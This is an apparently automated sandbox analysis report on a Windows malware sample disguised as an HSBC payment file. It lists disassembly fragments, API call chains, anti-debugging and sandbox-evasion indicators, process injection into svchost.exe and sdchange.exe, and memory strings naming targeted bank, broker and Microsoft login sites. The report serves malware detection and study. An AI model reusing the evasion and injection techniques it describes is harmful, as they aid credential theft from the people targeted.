Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rHSBCBank_Paymentswiftcpy.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00724B37 LoadLibraryA,GetProcAddress,

0_2_00724B37

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0072C4C7 push A30072BAh; retn 0072h	0_2_0072C50D
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00748945 push ecx; ret	0_2_00748958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041402F push ss; ret	2_2_00414032
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00415921 push ebp; retf	2_2_00415929
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041629C pushad ; retf	2_2_0041629D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403370 push eax; ret	2_2_00403372
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411329 pushad ; ret	2_2_0041132F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401BC0 push esp; iretd	2_2_00401CFB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004083D4 push ebx; retf	2_2_004083D5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040BBE9 push ebp; retf	2_2_0040BBEC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401BB6 push esp; iretd	2_2_00401CFB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411556 push cs; iretd	2_2_00411557
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A519 push esp; retf	2_2_0041A51B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040ADDA pushad ; retf	2_2_0040AE05
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411584 pushad ; retf	2_2_00411587
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390225F pushad ; ret	2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039027FA pushad ; ret	2_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx	2_2_039309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390283D push eax; iretd	2_2_03902858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03901368 push eax; iretd	2_2_03901369
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0266CA74 pushad ; retf	4_2_0266CA77
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0266CA46 push cs; iretd	4_2_0266CA47
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_02675A09 push esp; retf	4_2_02675A0B
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_026662CA pushad ; retf	4_2_026662F5
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0266C819 pushad ; ret	4_2_0266C81F
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_026638C4 push ebx; retf	4_2_026638C5
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_026670D9 push ebp; retf	4_2_026670DC
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0267A1DF push esi; iretd	4_2_0267A21E
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_02670E11 push ebp; retf	4_2_02670E19
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0267D772 push es; retn 0000h	4_2_0267D77A
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Code function: 4_2_0267178C pushad ; retf	4_2_0267178D

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_007248D7
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_007A5376

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00743187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00743187

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	API/Special instruction interceptor: Address: 1F83224
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\sdchange.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0397096E rdtsc

2_2_0397096E

Source: C:\Windows\SysWOW64\sdchange.exe

Window / User API: threadDelayed 9808

Jump to behavior

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102193

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\sdchange.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\sdchange.exe TID: 6952	Thread sleep count: 165 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe TID: 6952	Thread sleep time: -330000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe TID: 6952	Thread sleep count: 9808 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe TID: 6952	Thread sleep time: -19616000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe TID: 5372	Thread sleep time: -65000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe TID: 5372	Thread sleep time: -33000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\sdchange.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdchange.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0078445A
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078C6D1 FindFirstFileW,FindClose,	0_2_0078C6D1
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0078C75C
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0078EF95
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0078F0F2
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0078F3F3
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_007837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007837EF
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00783B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00783B12
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0078BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0078BCBC
Source: C:\Windows\SysWOW64\sdchange.exe	Code function: 5_2_02E1C0D0 FindFirstFileW,FindNextFileW,FindClose,	5_2_02E1C0D0

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007249A0

Source: 1n436243.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 1n436243.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 1n436243.5.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: sdchange.exe, 00000005.00000002.3954559304.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: merica.comVMware20,11696487552\|UE
Source: 1n436243.5.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rokers - COM.HKVMware20,11696487552
Source: EqOUZfSIzU.exe, 00000006.00000002.3955665444.000000000112F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: East & CentralVMware20,11696487552
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: anara Transaction PasswordVMware20,11696487552x
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: on-EU EuropeVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: swordVMware20,11696487552}
Source: 1n436243.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: w.interactivebrokers.comVMware20,11696487552}
Source: 1n436243.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487
Source: 1n436243.5.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 1n436243.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: firefox.exe, 00000009.00000002.2677038200.000002E25220D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy
Source: 1n436243.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 1n436243.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: sdchange.exe, 00000005.00000002.3960350765.0000000008018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552~
Source: 1n436243.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 1n436243.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 1n436243.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 1n436243.5.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 1n436243.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 1n436243.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 1n436243.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 1n436243.5.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 1n436243.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 1n436243.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 1n436243.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 1n436243.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 1n436243.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

API call chain: ExitProcess graph end node

graph_0-101384

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0397096E rdtsc

2_2_0397096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004173B3 LdrLoadDll,

2_2_004173B3

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00793F09 BlockInput,

0_2_00793F09

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00723B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00723B3A

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00755A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00755A7C

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00724B37 LoadLibraryA,GetProcAddress,

0_2_00724B37

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_01F834F0 mov eax, dword ptr fs:[00000030h]	0_2_01F834F0
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_01F83490 mov eax, dword ptr fs:[00000030h]	0_2_01F83490
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_01F81E70 mov eax, dword ptr fs:[00000030h]	0_2_01F81E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]	2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]	2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]	2_2_03928397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]	2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]	2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]	2_2_0392E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]	2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]	2_2_0395438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]	2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]	2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]	2_2_039DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]	2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]	2_2_039D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]	2_2_039EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0393A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]	2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]	2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]	2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]	2_2_039383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]	2_2_039B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]	2_2_039663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]	2_2_039403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]	2_2_0392C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]	2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]	2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]	2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]	2_2_03A08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]	2_2_03950310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]	2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]	2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]	2_2_0396A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]	2_2_039B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]	2_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]	2_2_039D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]	2_2_039B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]	2_2_039D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]	2_2_03A0634F
